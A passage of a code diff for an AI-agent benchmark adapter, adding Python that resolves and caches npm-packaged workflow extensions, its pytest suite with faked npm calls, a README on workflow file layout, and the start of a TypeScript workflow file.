+    base = f"npm:{package_name}@{version}"
+    digest = pack_result.integrity or (f"sha1-{pack_result.shasum}" if pack_result.shasum else None)
+    if not digest:
+        # Registry genuinely gave us nothing beyond the resolved version —
+        # the pinned spec string (with the version filled in) is the honest
+        # fallback, same principle as dir:'s "dirty" for a non-git checkout.
+        return base, base
+    _, _, tail = digest.partition("-")
+    short_digest = (tail or digest)[:12]
+    return f"{base}+{digest}", f"{base}+{short_digest}"
+
+
+def _load_npm_cache_entry(cache_dir: Path) -> ResolvedExtension | None:
+    marker = cache_dir / _NPM_CACHE_MARKER
+    package_root = cache_dir / "package"
+    if not marker.is_file() or not package_root.is_dir():
+        return None
+    try:
+        meta = json.loads(marker.read_text())
+        identity = meta["identity"]
+        short_identity = meta["short_identity"]
+    except (OSError, json.JSONDecodeError, KeyError):
+        # A marker that exists but doesn't parse is not a good cache entry —
+        # treat it exactly like a missing one and let the caller re-resolve.
+        return None
+    return ResolvedExtension(host_dir=package_root, identity=identity, short_identity=short_identity)
+
+
+def _publish_npm_cache_entry(staging: Path, cache_dir: Path, built: ResolvedExtension) -> ResolvedExtension:
+    """
+    A simple rename is going to fail if the target directory exists and is not empty.
+    """
+    try:
+        staging.rename(cache_dir)
+        # renamed successfully
+        return built
+    except OSError:
+        pass
+
+    # check if cache directory exists
+    cached = _load_npm_cache_entry(cache_dir)
+    if cached is not None:
+        return cached
+
+    quarantine: Path | None = cache_dir.with_name(f".{cache_dir.name}.stale-{uuid.uuid4().hex[:12]}")
+    try:
+        cache_dir.rename(quarantine)
+    except OSError:
+        # Another process cleared the same leftover first. Whatever it has done
+        # with the freed name since is one of the two cases already handled.
+        quarantine = None
+    try:
+        staging.rename(cache_dir)
+        return built
+    except OSError:
+        # another process published here first — use its entry, do not fail
+        cached = _load_npm_cache_entry(cache_dir)
+        if cached is None:
+            raise
+        return cached
+    finally:
+        if quarantine is not None:
+            shutil.rmtree(quarantine, ignore_errors=True)
+
+
+def _resolve_npm(
+    spec: NpmExtensionSpec,
+    *,
+    cache_root: Path,
+    npm_pack: Callable[[str, Path], NpmPackResult],
+    npm_install_runtime_deps: Callable[[Path], None],
+) -> ResolvedExtension:
+    pack_spec = spec.raw[len(_NPM_PREFIX) :]
+    package_name, pinned_version = _split_npm_pkg_and_version(pack_spec)
+
+    # Fast path: a PINNED spec's cache directory is knowable without asking
+    # the registry anything, so a hit here costs zero network calls — this is
+    # what makes a job of N trials against a pinned spec resolve once, in the
+    # first trial, and every later trial a pure filesystem read.
+    if pinned_version is not None:
+        cached = _load_npm_cache_entry(cache_root / _npm_cache_key(package_name, pinned_version))
+        if cached is not None:
+            return cached
+
+    cache_root.mkdir(parents=True, exist_ok=True)
+    staging = Path(tempfile.mkdtemp(prefix=".kimchi-npm-stage-", dir=cache_root))
+    try:
+        pack_result = npm_pack(pack_spec, staging)
+        resolved_version = pack_result.version
+        cache_dir = cache_root / _npm_cache_key(package_name, resolved_version)
+
+        # An UNPINNED spec only learns its target directory here, after
+        # asking the registry — but if that resolved version is one this (or
+        # any other) process already finished installing, the work below is
+        # redundant; reuse it rather than re-downloading and re-installing.
+        cached = _load_npm_cache_entry(cache_dir)
+        if cached is not None:
+            return cached
+
+        package_root = _extract_npm_tarball(staging / pack_result.filename, staging)
+        npm_install_runtime_deps(package_root)
+
+        identity, short_identity = _npm_identity(package_name, resolved_version, pack_result)
+        # Written INSIDE the staging dir, before it becomes the cache entry —
+        # so the rename below either publishes a directory that already has
+        # its marker, or doesn't publish at all. There is no window where a
+        # marker-less directory is visible at the final cache path.
+        (staging / _NPM_CACHE_MARKER).write_text(json.dumps({"identity": identity, "short_identity": short_identity}))
+
+        # Publish by rename only — see _publish_npm_cache_entry for why the
+        # occupied-target cases are handled by moving directories rather than
+        # by deleting one where another process may be reading it.
+        return _publish_npm_cache_entry(
+            staging,
+            cache_dir,
+            ResolvedExtension(host_dir=cache_dir / "package", identity=identity, short_identity=short_identity),
+        )
+    finally:
+        # No-op if `staging` was already renamed away above; cleans up a
+        # leftover only when this resolve returned early (cache hit) or
+        # raised partway through.
+        shutil.rmtree(staging, ignore_errors=True)
+
+
+def _extract_npm_tarball(tarball_path: Path, dest_dir: Path) -> Path:
+    with tarfile.open(tarball_path, "r:gz") as tar:
+        tar.extractall(dest_dir, filter="data")
+    package_root = dest_dir / "package"
+    if not (package_root / "package.json").is_file():
+        raise RuntimeError(
+            f"npm pack tarball {tarball_path} did not extract a 'package/package.json' — "
+            "not a valid npm package archive"
+        )
+    return package_root

--- a/benchmark/terminal-bench-2/src/kimchi_agent/workflow_extension_test.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/workflow_extension_test.py
@@ -1,0 +1,459 @@
+"""Unit tests for host-side extension resolution (`workflow_extension.py`).
+
+`workflow_agent_test.py` covers `WorkflowAgent`'s use of the
+`extension_resolver` seam (always injected there, so it never reaches this
+module's real logic). This file exercises `resolve_extension_spec` itself —
+the caching, provenance and dispatch logic — through its own injectable
+`npm_pack`/`npm_install_runtime_deps` seams, so it never shells out to `npm`
+or touches the network either — resolution is designed to stay an
+injectable seam throughout.
+"""
+
+import io
+import json
+import subprocess
+import tarfile
+from collections.abc import Callable
+from pathlib import Path
+
+import pytest
+
+from kimchi_agent import workflow_extension
+from kimchi_agent.workflow_extension import (
+    DirExtensionSpec,
+    NpmExtensionSpec,
+    NpmPackResult,
+    resolve_extension_spec,
+)
+
+
+def _write_fake_npm_tarball(dest_dir: Path, filename: str, *, extra_files: dict[str, str] | None = None) -> None:
+    """Build a real gzipped tar matching what `npm pack` produces: a
+    top-level `package/` directory containing `package.json`. Real tarfile
+    extraction logic runs against this fixture — only the network/subprocess
+    call that would normally produce it is faked.
+    """
+
+    def _add_text(tar: tarfile.TarFile, arcname: str, content: str) -> None:
+        data = content.encode()
+        info = tarfile.TarInfo(name=arcname)
+        info.size = len(data)
+        tar.addfile(info, io.BytesIO(data))
+
+    with tarfile.open(dest_dir / filename, "w:gz") as tar:
+        _add_text(tar, "package/package.json", json.dumps({"name": "fake-pkg"}))
+        for rel, content in (extra_files or {}).items():
+            _add_text(tar, f"package/{rel}", content)
+
+
+def _fake_npm_pack(
+    *,
+    version: str,
+    shasum: str | None = "deadbeefcafebabedeadbeefcafebabedeadbeef",
+    integrity: str | None = "sha512-abc123def456ghi789==",
+    calls: list[str],
+) -> Callable[[str, Path], NpmPackResult]:
+    def fake(pack_spec: str, dest_dir: Path) -> NpmPackResult:
+        calls.append(pack_spec)
+        filename = "pkg.tgz"
+        _write_fake_npm_tarball(dest_dir, filename)
+        return NpmPackResult(version=version, filename=filename, shasum=shasum, integrity=integrity)
+
+    return fake
+
+
+def _fake_npm_install(calls: list[Path]) -> Callable[[Path], None]:
+    def fake(package_dir: Path) -> None:
+        calls.append(package_dir)
+        # A real `npm install --omit=dev --omit=peer` would populate this;
+        # nothing reads it back in these tests, but it makes the fixture
+        # honest about what the real seam leaves behind.
+        (package_dir / "node_modules" / "jiti").mkdir(parents=True, exist_ok=True)
+
+    return fake
+
+
+# --- dispatch: resolve_extension_spec routes by spec type -------------------
+
+
+def test_resolve_extension_spec_dispatches_dir_without_touching_npm_seams(tmp_path: Path) -> None:
+    checkout = tmp_path / "kimchi-workflows"
+    checkout.mkdir()
+
+    def pack_must_not_be_called(pack_spec: str, dest_dir: Path) -> NpmPackResult:
+        raise AssertionError("npm_pack must not be called for a dir: spec")
+
+    resolved = resolve_extension_spec(
+        DirExtensionSpec(path=checkout),
+        cache_root=tmp_path / "cache",
+        npm_pack=pack_must_not_be_called,
+        npm_install_runtime_deps=lambda p: (_ for _ in ()).throw(AssertionError("must not be called")),
+    )
+
+    assert resolved.host_dir == checkout
+    assert resolved.identity == f"dir:{checkout}@dirty"
+
+
+# --- npm: resolution — pinned spec, cache reuse ------------------------------
+
+
+def test_resolve_npm_pinned_spec_installs_once_and_uploads_from_the_extracted_package_root(
+    tmp_path: Path,
+) -> None:
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+    pack_calls: list[str] = []
+    install_calls: list[Path] = []
+
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.1.0", calls=pack_calls),
+        npm_install_runtime_deps=_fake_npm_install(install_calls),
+    )
+
+    assert pack_calls == ["@kimchi-dev/kimchi-workflows@0.1.0"]
+    assert len(install_calls) == 1
+    # npm_install_runtime_deps runs against the STAGING copy, before it's
+    # atomically renamed into place as the cache entry — so it's the same
+    # "package" leaf, under a different (pre-rename) parent.
+    assert install_calls[0].name == "package"
+    assert install_calls[0].parent.parent == cache_root
+    assert (resolved.host_dir / "package.json").is_file()
+    assert (resolved.host_dir / "node_modules" / "jiti").is_dir()
+    # Uploaded verbatim by WorkflowAgent.install() — the dir has to actually
+    # be the extracted package root, not the cache entry's parent.
+    assert resolved.host_dir.name == "package"
+
+
+def test_resolve_npm_pinned_spec_second_resolve_is_a_pure_cache_hit(tmp_path: Path) -> None:
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+
+    first_pack_calls: list[str] = []
+    first_install_calls: list[Path] = []
+    first = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.1.0", calls=first_pack_calls),
+        npm_install_runtime_deps=_fake_npm_install(first_install_calls),
+    )
+
+    # Fresh call-recording lists for the second resolve: if either seam gets
+    # invoked at all, these stay non-empty and the assertion below fails —
+    # that's the whole point of a cache "reuse", not just "cheaper reuse".
+    second_pack_calls: list[str] = []
+    second_install_calls: list[Path] = []
+    second = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.1.0", calls=second_pack_calls),
+        npm_install_runtime_deps=_fake_npm_install(second_install_calls),
+    )
+
+    assert second_pack_calls == []
+    assert second_install_calls == []
+    assert second == first
+
+
+def test_resolve_npm_unpinned_spec_still_calls_pack_but_reuses_install_once_version_is_known(
+    tmp_path: Path,
+) -> None:
+    # An unpinned spec's cache directory isn't knowable without asking the
+    # registry, so `npm_pack` runs every resolve (documented cost of staying
+    # unpinned) — but once the resolved version is known, a second
+    # resolve that lands on the SAME version must not redo the install.
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows")  # no @<version>
+
+    first_pack_calls: list[str] = []
+    first_install_calls: list[Path] = []
+    first = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.9.0", calls=first_pack_calls),
+        npm_install_runtime_deps=_fake_npm_install(first_install_calls),
+    )
+    assert first_pack_calls == ["@kimchi-dev/kimchi-workflows"]
+    assert len(first_install_calls) == 1
+
+    second_pack_calls: list[str] = []
+    second_install_calls: list[Path] = []
+    second = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.9.0", calls=second_pack_calls),  # registry resolves the same version again
+        npm_install_runtime_deps=_fake_npm_install(second_install_calls),
+    )
+
+    assert second_pack_calls == ["@kimchi-dev/kimchi-workflows"]  # pack DOES run again
+    assert second_install_calls == []  # install does NOT — the version was already cached
+    assert second == first
+
+
+# --- cache key sanitisation ---------------------------------------------------
+
+
+def test_resolve_npm_cache_dir_sanitises_a_scoped_package_name(tmp_path: Path) -> None:
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.0.1-0")
+
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.0.1-0", calls=[]),
+        npm_install_runtime_deps=_fake_npm_install([]),
+    )
+
+    expected = cache_root / "kimchi-dev-kimchi-workflows-0.0.1-0" / "package"
+    assert resolved.host_dir == expected
+
+
+def test_resolve_npm_cache_dir_for_unscoped_package_has_no_leading_dash(tmp_path: Path) -> None:
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:kimchi-workflows@1.2.3")
+
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="1.2.3", calls=[]),
+        npm_install_runtime_deps=_fake_npm_install([]),
+    )
+
+    assert resolved.host_dir == cache_root / "kimchi-workflows-1.2.3" / "package"
+
+
+# --- provenance ----------------------------------------------------------------
+
+
+def test_resolve_npm_identity_includes_resolved_version_and_integrity(tmp_path: Path) -> None:
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=tmp_path / "cache",
+        npm_pack=_fake_npm_pack(version="0.1.0", integrity="sha512-abc123def456ghi789==", calls=[]),
+        npm_install_runtime_deps=_fake_npm_install([]),
+    )
+
+    assert resolved.identity == "npm:@kimchi-dev/kimchi-workflows@0.1.0+sha512-abc123def456ghi789=="
+    # short_identity carries a truncated digest — compact enough to embed in
+    # AgentInfo.version, unlike the ~88-char full SRI hash in `identity`.
+    assert resolved.short_identity == "npm:@kimchi-dev/kimchi-workflows@0.1.0+abc123def456"
+    assert len(resolved.short_identity) < len(resolved.identity)
+
+
+def test_resolve_npm_identity_falls_back_to_shasum_when_no_integrity(tmp_path: Path) -> None:
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=tmp_path / "cache",
+        npm_pack=_fake_npm_pack(version="0.1.0", integrity=None, shasum="deadbeefcafebabe", calls=[]),
+        npm_install_runtime_deps=_fake_npm_install([]),
+    )
+
+    assert resolved.identity == "npm:@kimchi-dev/kimchi-workflows@0.1.0+sha1-deadbeefcafebabe"
+
+
+def test_resolve_npm_identity_falls_back_to_the_pinned_spec_string_with_no_registry_hash(tmp_path: Path) -> None:
+    # "prefer the resolved version plus the registry integrity/shasum ... ,
+    # falling back to the pinned spec string" — this is that fallback: the
+    # registry gave nothing to hash, so the honest identity is just the
+    # resolved package@version, same shape as the original spec string.
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=tmp_path / "cache",
+        npm_pack=_fake_npm_pack(version="0.1.0", integrity=None, shasum=None, calls=[]),
+        npm_install_runtime_deps=_fake_npm_install([]),
+    )
+
+    assert resolved.identity == "npm:@kimchi-dev/kimchi-workflows@0.1.0"
+    assert resolved.short_identity == "npm:@kimchi-dev/kimchi-workflows@0.1.0"
+
+
+# --- marker-file completeness: an interrupted resolve is not a cache hit ----
+
+
+def test_resolve_npm_treats_a_marker_less_directory_as_a_cache_miss(tmp_path: Path) -> None:
+    # Simulate a resolve that died after extraction but before the
+    # `.install-complete.json` marker was written (e.g. `npm install` was
+    # killed partway) — a real, plausible interrupted state, not a
+    # hypothetical one. The next resolve must not trust it.
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+    stale_package_root = cache_root / "kimchi-dev-kimchi-workflows-0.1.0" / "package"
+    stale_package_root.mkdir(parents=True)
+    (stale_package_root / "package.json").write_text("{}")
+    # Deliberately NO .install-complete.json marker written.
+
+    pack_calls: list[str] = []
+    install_calls: list[Path] = []
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.1.0", calls=pack_calls),
+        npm_install_runtime_deps=_fake_npm_install(install_calls),
+    )
+
+    # Re-resolved from scratch rather than trusting the marker-less directory.
+    assert pack_calls == ["@kimchi-dev/kimchi-workflows@0.1.0"]
+    assert len(install_calls) == 1
+    assert (resolved.host_dir / "node_modules" / "jiti").is_dir()
+
+
+def test_resolve_npm_treats_an_unparseable_marker_as_a_cache_miss(tmp_path: Path) -> None:
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+    entry_dir = cache_root / "kimchi-dev-kimchi-workflows-0.1.0"
+    package_root = entry_dir / "package"
+    package_root.mkdir(parents=True)
+    (package_root / "package.json").write_text("{}")
+    (entry_dir / ".install-complete.json").write_text("not valid json")
+
+    pack_calls: list[str] = []
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.1.0", calls=pack_calls),
+        npm_install_runtime_deps=_fake_npm_install([]),
+    )
+
+    assert pack_calls == ["@kimchi-dev/kimchi-workflows@0.1.0"]
+    assert resolved.identity.startswith("npm:@kimchi-dev/kimchi-workflows@0.1.0+")
+
+
+def test_resolve_npm_writes_marker_only_after_a_complete_install(tmp_path: Path) -> None:
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+
+    resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.1.0", calls=[]),
+        npm_install_runtime_deps=_fake_npm_install([]),
+    )
+
+    marker = cache_root / "kimchi-dev-kimchi-workflows-0.1.0" / ".install-complete.json"
+    assert marker.is_file()
+    meta = json.loads(marker.read_text())
+    assert meta["identity"].startswith("npm:@kimchi-dev/kimchi-workflows@0.1.0")
+
+    # No leftover staging directories: the successful run's temp build dir
+    # was renamed into place, not left behind under the cache root.
+    leftovers = [p for p in cache_root.iterdir() if p.name.startswith(".kimchi-npm-stage-")]
+    assert leftovers == []
+
+
+# --- publishing a finished build: never destroy a directory in place ---------
+
+
+def test_resolve_npm_reuses_a_complete_entry_another_process_published_mid_install(tmp_path: Path) -> None:
+    """The publish-time race, made deterministic.
+
+    Two `harbor run` jobs sharing one cache root is the only way to reach this
+    path — in-process, harbor's concurrent trials are asyncio tasks on one
+    event loop and the blocking `npm` calls pin it for the whole resolve. So
+    the other process is simulated *from inside* the install seam: it finishes
+    and publishes a complete entry at the exact cache key this resolve is
+    about to claim, while this resolve is still inside `npm install`.
+
+    Its entry must be reused intact. Deleting it to make room for an
+    equivalent rebuild is not merely wasteful: a third job that hit the cache
+    moments ago may be uploading out of `cache_dir/package` right now.
+    """
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+    cache_dir = cache_root / "kimchi-dev-kimchi-workflows-0.1.0"
+
+    def install_and_lose_the_race(package_dir: Path) -> None:
+        (package_dir / "node_modules" / "jiti").mkdir(parents=True, exist_ok=True)
+        winner_package = cache_dir / "package"
+        winner_package.mkdir(parents=True)
+        (winner_package / "package.json").write_text(json.dumps({"name": "fake-pkg"}))
+        (winner_package / "published-by-the-other-process").write_text("x\n")
+        (cache_dir / ".install-complete.json").write_text(
+            json.dumps(
+                {
+                    "identity": "npm:@kimchi-dev/kimchi-workflows@0.1.0+sha512-winner==",
+                    "short_identity": "npm:@kimchi-dev/kimchi-workflows@0.1.0+winner",
+                }
+            )
+        )
+
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.1.0", calls=[]),
+        npm_install_runtime_deps=install_and_lose_the_race,
+    )
+
+    # The winner's provenance, not this process's own — the returned identity
+    # is the one on disk, so result.json cannot claim a build that got discarded.
+    assert resolved.identity == "npm:@kimchi-dev/kimchi-workflows@0.1.0+sha512-winner=="
+    assert resolved.host_dir == cache_dir / "package"
+    # Reused intact rather than deleted and replaced by an equivalent rebuild.
+    assert (resolved.host_dir / "published-by-the-other-process").is_file()
+    # And this resolve's own discarded build left nothing behind under the cache root.
+    assert sorted(p.name for p in cache_root.iterdir()) == [cache_dir.name]
+
+
+def test_resolve_npm_replaces_a_marker_less_leftover_without_leaving_a_quarantine_behind(tmp_path: Path) -> None:
+    # A marker-less directory occupying the cache key is a leftover from an
+    # interrupted resolve, and unlike the complete entry above it must NOT be
+    # reused. It is still renamed aside rather than removed where it stands
+    # (see _publish_npm_cache_entry) — so what this pins is that the aside
+    # copy really is cleaned up afterwards, and that the fresh build wins.
+    cache_root = tmp_path / "cache"
+    spec = NpmExtensionSpec(raw="npm:@kimchi-dev/kimchi-workflows@0.1.0")
+    cache_dir = cache_root / "kimchi-dev-kimchi-workflows-0.1.0"
+    stale_package = cache_dir / "package"
+    stale_package.mkdir(parents=True)
+    (stale_package / "package.json").write_text("{}")
+    (stale_package / "half-installed-leftover").write_text("x\n")
+    # Deliberately NO .install-complete.json marker written.
+
+    resolved = resolve_extension_spec(
+        spec,
+        cache_root=cache_root,
+        npm_pack=_fake_npm_pack(version="0.1.0", calls=[]),
+        npm_install_runtime_deps=_fake_npm_install([]),
+    )
+
+    assert resolved.host_dir == cache_dir / "package"
+    assert (resolved.host_dir / "node_modules" / "jiti").is_dir()
+    assert not (resolved.host_dir / "half-installed-leftover").exists()
+    assert (cache_dir / ".install-complete.json").is_file()
+    # Nothing of the leftover — nor any quarantine or staging dir — survives.
+    assert sorted(p.name for p in cache_root.iterdir()) == [cache_dir.name]
+
+
+# --- host-side execution boundary ---------------------------------------------
+
+
+def test_npm_install_runtime_deps_ignores_lifecycle_scripts(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:
+    """Reaches past the injectable seam to the real ``_npm_install_runtime_deps``
+    on purpose: this is the one call in the whole adapter that runs a resolved
+    extension's code (or a dependency's) on the **benchmark host** rather than
+    inside the throwaway task container, and that host holds ``KIMCHI_API_KEY``.
+    Every other test here fakes the seam away, which would let
+    ``--ignore-scripts`` be dropped without a single failure.
+    """
+    captured: list[list[str]] = []
+
+    def fake_run(command: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]:
+        captured.append(command)
+        return subprocess.CompletedProcess(command, 0, stdout="", stderr="")
+
+    monkeypatch.setattr(workflow_extension.subprocess, "run", fake_run)
+
+    workflow_extension._npm_install_runtime_deps(tmp_path)
+
+    assert len(captured) == 1
+    assert "--ignore-scripts" in captured[0]
+    # The flags this step exists for must survive alongside it.
+    assert captured[0][:2] == ["npm", "install"]
+    assert "--omit=dev" in captured[0]
+    assert "--omit=peer" in captured[0]

--- a/benchmark/terminal-bench-2/workflows/README.md
+++ b/benchmark/terminal-bench-2/workflows/README.md
@@ -1,0 +1,151 @@
+# Workflow definitions
+
+This directory holds the `kimchi-workflows` workflow definitions that
+`WorkflowAgent` (`src/kimchi_agent/workflow_agent.py`) runs.
+
+## What's here
+
+- `ferment-oneshot.workflow.ts` — kimchi's one-shot ferment (`kimchi
+  --ferment-oneshot`), ported 1:1 as a workflow: the same planning process, the
+  same P/S/F/C gate registry, the same budget tiers, the same judge standing
+  in for the user, the same verification triage, with only the ferment's
+  in-session continuation machinery (stop nudges, "call X now" scheduler
+  messages) removed — the engine is the state machine here, so there is no
+  turn left to nudge. Its declared name is `ferment-oneshot`, matching the
+  filename, which is what lets `/workflow run ferment-oneshot` resolve it by
+  convention (see "A workflow is selected..." below).
+- `ferment/` — that workflow's helper modules: `contract.ts` (schemas, the
+  gate registry, budget tiers, and this workflow's own copy of the top-level
+  input schema — see below), `prompts.ts` (what each step is told, with
+  provenance back to the kimchi file it came from), and `verify.ts` (runs a
+  step's verify command and gathers the diff its phase grader is shown).
+- `test/ferment-oneshot.test.ts` — that workflow's behavioural test suite
+  (ported from kimchi-workflows' own `test/` when the workflow moved here;
+  see "Typechecking and tests" below), scripting every agent step and
+  stubbing the git/verify calls so it pins the WIRING without a model or a
+  container. This directory is not `*.workflow.ts`-discoverable and never
+  copied anywhere `WorkflowAgent` looks for a workflow to run — see "What
+  goes here" below for why a workflow file itself must stay non-recursively
+  at this top level regardless.
+
+`tb-solver` — the other workflow designed for comparison against
+`ferment-oneshot` — is **not** here. It was designed around a wall-clock
+deadline the adapter no longer supplies (harbor hands `agent_timeout_sec`
+only to the oracle agent), and porting its scheduling to that reality is
+future work, not a mechanical move. It still lives in the
+`kimchi-workflows` checkout at
+`benchmarks/terminal-bench/tb-solver.workflow.ts`.
+
+### Why `ferment-oneshot`'s input schema doesn't match `tb-solver`'s
+
+`ferment/contract.ts` declares its own `taskInputSchema` —
+`Type.Object({ instruction: Type.String() })` — rather than importing
+`tb-solver`'s (which also has a `deadlineIso: Type.String()` field, required).
+`ferment-oneshot` never reads a deadline anywhere in its steps; it is bounded
+only by harbor's own agent-phase timeout, enforced from outside the
+container, never told to the workflow (see the "Budgets" comment at the top
+of `ferment-oneshot.workflow.ts`). The harbor adapter's envelope is exactly
+`{"instruction": ...}` (`workflow_agent.py`'s `_pre_launch_commands`), and the
+extension validates input against a workflow's declared schema **before** the
+run starts — so a required `deadlineIso` this workflow never sends would fail
+every run's input validation in the first second.
+
+## What goes here
+
+- Every workflow must be a `*.workflow.ts` file, **at the top level of this
+  directory**. `discoverWorkflows` (`kimchi-workflows/src/host/workflow-catalog.ts`)
+  does a non-recursive `readdir` for `*.workflow.ts`, so a workflow file
+  nested in a subdirectory is invisible to every name-based lookup — only its
+  helper modules may live under a subdirectory (like `ferment/` here), reached
+  by relative import from the top-level file. The upload is recursive so those
+  helpers reach the container; discovery is not. `WorkflowAgent.install()`
+  fails at install if nothing that reaches the container can serve the
+  requested `workflow=`.
+
+  A nested file can still be run by path —
+  `workflow=.kimchi/workflows/<subdir>/<file>.workflow.ts`, which
+  `resolveWorkflow` tries before any name lookup. That is an escape hatch, not
+  the convention: it puts a container path into `AgentInfo.version` where a
+  workflow name belongs.
+- Each file imports `@kimchi-dev/kimchi-workflows` (and `typebox` for its
+  input/output schemas) with no `node_modules` alongside it. Both bare
+  imports are supplied at load time by the extension's `jiti`-based loader
+  via virtual modules (`load-workflow.ts`), which hands the workflow the
+  *same* `typebox` instance the engine validates against — installing a
+  second copy locally would silently produce two incompatible instances. Use
+  the bare specifier (`@kimchi-dev/kimchi-workflows`), never a deep path like
+  `@kimchi-dev/kimchi-workflows/dist/flow/index.js` — the loader's virtual
+  module map is keyed on the published names exactly, and a deep path simply
+  will not resolve inside the container.
+- A workflow is selected **by its own declared name**, not by filename.
+  `WorkflowAgent`'s `workflow=<name>` agent kwarg is passed straight through
+  to `/workflow run <name>`, and the extension resolves it against this
+  directory once uploaded into the container. `resolveByConvention`
+  (`workflow-catalog.ts`) only accepts the `<name>.workflow.ts` path when the
+  file's declared `name` equals `<name>` — so a workflow's filename and its
+  `name: "..."` field must be kept in sync, or the convention lookup silently
+  falls through to a full catalog scan. Editing a workflow in place changes
+  its behaviour without changing its identity in `result.json`
+  — give an edited variant its own file *and* its own declared name (e.g.
+  `ferment-oneshot-v2`) if you want the two to be distinguishable in results.
+
+## Where this ends up in the container
+
+Nothing in this directory is committed to talk to `kimchi-workflows`
+directly. `WorkflowAgent.install()` uploads it verbatim to a staging path,
+`/installed-agent/workflows`, once per install. Each run then copies that
+staging path into the project directory the extension actually looks in —
+`.kimchi/workflows/`, relative to whatever `$PWD` kimchi launches from —
+immediately before `kimchi` starts. That final hop is where `resolveWorkflow`
+finds workflows by name; nothing about the extension's catalog resolution is
+adapter-specific.
+
+## Typechecking and tests (optional, dev-only)
+
+Nothing in this directory needs `node_modules` to **run** — the container
+loads every workflow through the extension's `jiti`-based loader, which
+supplies `typebox` and `@kimchi-dev/kimchi-workflows` as virtual modules with
+no install step at all (see "What goes here", above). `package.json` and
+`tsconfig.json` here exist purely so this ~2600 lines of TypeScript gets real
+static checking during development, and so each workflow can carry a real
+behavioural test suite (`test/*.test.ts`, one per workflow, vitest), instead
+of having neither until a container actually runs it.
+
+```bash
+cd workflows
+npm ci          # lockfile is committed; `npm install` also works
+npm run typecheck
+npm test
+```
+
+`@kimchi-dev/kimchi-workflows` is a normal registry dependency here, pinned to
+the exact published version. Nothing else is needed: `npm install` in this
+directory is self-contained, with no sibling checkout and no build step in
+another repo. That pin is also the point — these tests and this typecheck are
+only meaningful against the same engine version a run will actually load, so
+when the `EXTENSION` default in `scripts/run-workflow.sh` moves, this pin
+moves with it.
+
+Tests import only the package's published entry points
+(`@kimchi-dev/kimchi-workflows`, `@kimchi-dev/kimchi-workflows/testing`) plus
+the workflow file under test and its own local helper modules by relative
+path — never a deep `src/` or `dist/` path — for the same reason "What goes
+here" gives workflow files themselves: those paths are not exported and are
+free to change shape without notice.
+
+**None of this dev-only scaffolding reaches a task container**, so there is
+nothing to clean up before a trial. `WorkflowAgent.install()` stages a copy
+filtered through `WORKFLOWS_UPLOAD_IGNORE` and uploads that instead of this
+directory: `node_modules`, `test`, `package.json`, `package-lock.json`,
+`tsconfig.json`, `vitest.config.ts`, `.gitignore` and `README.md` are all
+excluded. It is a denylist because a workflow may legitimately need a data
+file beside it. Two tests in `workflow_agent_test.py` pin the filtering — add
+any new dev-only scaffolding to that tuple and to those tests.
+
+Worth knowing anyway, since it explains the exclusions: `npm install` here
+puts tens of MB of `typescript`/`vitest`/`typebox` in `node_modules/`, plus a
+`node_modules/@kimchi-dev/kimchi-workflows` entry that on some setups is a
+symlink pointing *outside this directory*. Uploaded, that would be dead
+weight at best and a dangling symlink at worst. `*.workflow.ts` discovery is
+non-recursive, so it was never at risk of mistaking any of it for a workflow
+— the cost was purely upload size and broken links.

--- a/benchmark/terminal-bench-2/workflows/ferment-oneshot.workflow.ts
+++ b/benchmark/terminal-bench-2/workflows/ferment-oneshot.workflow.ts
@@ -1,0 +1,1158 @@
+/**
+ * kimchi's one-shot ferment, as a workflow: plan → (phase → (step → verify)* → phase gates)* → ship.
+ *
+ * This is the ALTERNATIVE to `tb-solver.workflow.ts` (kimchi-workflows repo, `benchmarks/terminal-bench/`),
+ * and it is a different bet. `tb-solver` was designed from measured terminal-bench failures and owes
+ * kimchi nothing. This one owes kimchi everything: it is a 1:1 rendering of what `kimchi --ferment-oneshot`
